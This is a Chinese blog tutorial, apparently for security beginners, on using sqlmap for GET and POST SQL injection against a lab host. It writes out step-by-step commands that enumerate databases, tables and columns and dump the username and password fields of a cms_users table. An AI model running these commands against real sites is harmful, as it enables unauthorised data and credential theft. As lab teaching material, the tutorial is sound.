全自动注入SqlMap

于 2022-08-29 20:16:03 发布
阅读量700 收藏 2
点赞数
分类专栏: 网络安全基础 文章标签: 数据库 mysql 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46219965/article/details/126591640
版权

文章目录

前言

本篇主要介绍通过使用全自动注入SqlMap实现GET注入和POST注入。

一、GET注入

1. -u

  • sqlmap -u "http://192.168.35.144/cms/show.php?id=35" 【 -u:需要扫描的url】
  • SqlMap 得到结果:
    • 针对GET参数是一个注入点,有四种注入方法:布尔盲注,报错注入,延时注入,联合查询
    • Payload 后面的东西就相当于一个注入时输入的模板
      在这里插入图片描述

2. -dbs

  • 语句:sqlmap -u "http://192.168.35.144/cms/show.php?id=35" --dbs 列出所有数据库的名字
    在这里插入图片描述

3. --current       ~~~~~      -db

语句: sqlmap -u "http://192.168.35.144/cms/show.php?id=35" --current-db 列出当前数据库的名字
在这里插入图片描述

4. -D       ~~~~~      –tables

语句:sqlmap -u "http://192.168.35.144/cms/show.php?id=35" -D "cms" --tables -D指定一个数据库 --tables 列出表名
在这里插入图片描述

5. -T       ~~~~~      –columns

语句:sqlmap -u "http://192.168.35.144/cms/show.php?id=35" -D "cms" -T "cms_users" --columns
【 -T 指定表名 --columns 列出表中所有字段 】
在这里插入图片描述

6. -C       ~~~~~      –dump

语句:sqlmap -u "http://192.168.35.144/cms/show.php?id=35" -D "cms" -T "cms_users" -C "username,password" --dump
【 -C 指定字段 --dump 列出字段内容 】
在这里插入图片描述

二、POST注入

Step1. 抓包

kali里使用BurpSuite,抓到POST数据包,并将这个包复制粘贴到kali的文件post.txt中
在这里插入图片描述

Step2. POST注入

sqlmap -r post.txt 自动读取包内容,并进行sql注入测试,并得到注入结果。
在这里插入图片描述

糯米糍粑咿呀咿呀
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用sqlmap进行sql自动注入攻击
shatianyzg的博客
05-31 367
sqlmap自动注入攻击
鬼客、cookie 全自动SQL注入工具
03-03
鬼客、cookie 全自动SQL注入工具 自动注入COOKIES漏洞的网站,无需COOKIES中转
SQLMAP自动注入
分享学习网络的点点滴滴
08-10 590
开源sql注入漏洞检测、利用工具检测动态页面中get/post参数、cookie、http头数据榨取文件系统访问操作系统命令执行引擎强大、特性丰富Xss漏洞检测。
sqlmap自动注入
Ethan024的博客
04-04 1005
sqlmap是什么: 自动SQL注入的接管工具。 sqlmap经典用法: 第一步: -u “xxx” --cookie=“yyy” //带上cookie对URL进行注入测试; 第二步: -u “xxx” --cookie=“yyy” -current-db //对数据库进行获取; 第三步: -u “xxx” --cookie=“yyy” -D pikachu --tables //对数据库的表名进行枚举; 第四步: -u “xxx” --cookie=“yyy” -D pikachu -T users
自动注入sqlmap工具使用
weixin_38115199的博客
03-11 739
自动注入sqlmapsqlmap简介主要功能功能使用软件安装基础操作渗透操作简单注入带参注入混淆注入代理注入数据获取获取shell典型注入流程防御思路 sqlmap简介 sqlmap是最强大的SQL注入渗透工具,基于Python编写,跨平台,基于命令行操作,集成了从注入探测到漏洞利用的整套渗透测试功能。 主要功能 支持探测DBMS的数据库和账号信息 支持枚举数据库/表/列并导出 支持主流数据库...
sqlmap自动注入工具
05-19
sqlmap自动注入工具可用于sql注入
sqlmap注入漏洞测试
02-22
资源内容:sqlmap注入漏洞测试
sqlmap中文手册-sql注入自动化测试工具
07-19
sql注入自动化测试工具sqlmap的操作手册,中文版,值得拥有哦。Web安全测试必备工具。
sqlmap注入神器
12-30
sqlmap是一款注入神器,灵活的运作它将是你更有效率的完成工作
SqlMap-Sql注入
08-02
Sqlmap是开源的自动SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix...
鬼客、cookie 全自动SQL注入工具.rar
11-04
鬼客、cookie 全自动SQL注入工具.rar
穿山甲全自动SQL注入工具Pangolin
11-24
自动SQL注入渗透测试工具Pangolin
使用SQLMAP自动化探测SQL注入
枫梓林のBlog
04-25 3902
使用SQLMAP自动化探测SQL注入 文章目录使用SQLMAP自动化探测SQL注入0x01 SQLMAP介绍1.SQLMAP 简介2.sqlmap支持的注入类型3.检查kali 系统中的 SQLmap 的版本信息0x02 SQLMAP 常用探测方式0.常用参数1.探测单个目标2.探测多个目标3.从文件加载HTTP 请求进行探测4.从burpsuite 日志记录中进行探测5.检测 SQL 注入存在的漏洞类型5.1 指定使用布尔型探测6.枚举数据库信息6.1 获取数据库名称6.2 获取表名称6.3 获取字段6.
sqlmap自动注入工具使用浅析
18年3月萌新白帽子
06-11 1452
Sqlmap简介:Sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。支持的数据库MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。Sqlmap支持五种常用的注入方式:1.联合...
SqlMap自动SQL注入测试工具简绍
YunWisdom
12-01 1544
Sqlmap是一个开源的渗透测试工具,可以自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎,为终极渗透测试仪提供了许多小众功能,以及从数据库指纹识别,从数据库获取数据到访问底层文件系统以及在操作系统上执行各种命令。 演示: # 使用SqlMap在特定目标URL上进行SQL注入测试 #日志末尾已经出现Mysql数据库版本,服务器版本,而且给出了可以使用SQL注入的...
[网络安全学习篇55]:SQL自动注入
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-01 2242
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我...
利用Sqlmap进行SQL注入攻击
m0_62689523的博客
08-14 1699
sqlmap简介 sqlmap是一款基于python编写的渗透测试工具,在sql检测和利用方面功能强大,支持多种数据库。 功能:sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。.........
自动SQL注入工具 – 鼹鼠v 0.3
weixin_33694620的博客
11-04 372
鼹鼠是一个自动SQL注入漏洞检测工具。只有在网站上提供了一个脆弱的URL和一个有效的字符串它可以检测注入和利用它,无论是使用工会法或布尔查询为基础的技术。产品特点支持使用MySQLSQL Server中,Postgres的和Oracle数据库的注射。命令行界面。不同的命令触发不同的动作。自动完成命令,命令参数和数据库,表和列名。支持过滤器,以便使用通用的过滤器绕过某些IPS...
SQL注入攻击——sqlmap的使用
m0_57069925的博客
06-03 3824
所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。数据库都是Web应用环境中非常重要的环节。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递到Web应用程序,也可以从其中发送出来。需要对这些数据进行控制,保证用户只能得到授权给他的信息。可是,很多Web站点都会利用用户输入的参数动态的生成SQL查询要求,攻击者通过在URL、表格域,或者其他的输入域中输入自己的SQL命令,以此改变查询属性,骗过应用程序,从而可以对数据库
sql注入sqlmap
最新发布
11-11
Sqlmap是一款开源的自动SQL注入工具,可以帮助安全测试人员快速检测和利用SQL注入漏洞。以下是使用Sqlmap进行SQL注入检测的步骤: 1. 确认目标网站存在SQL注入漏洞,可以通过手工注入或者使用Sqlmap进行检测。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值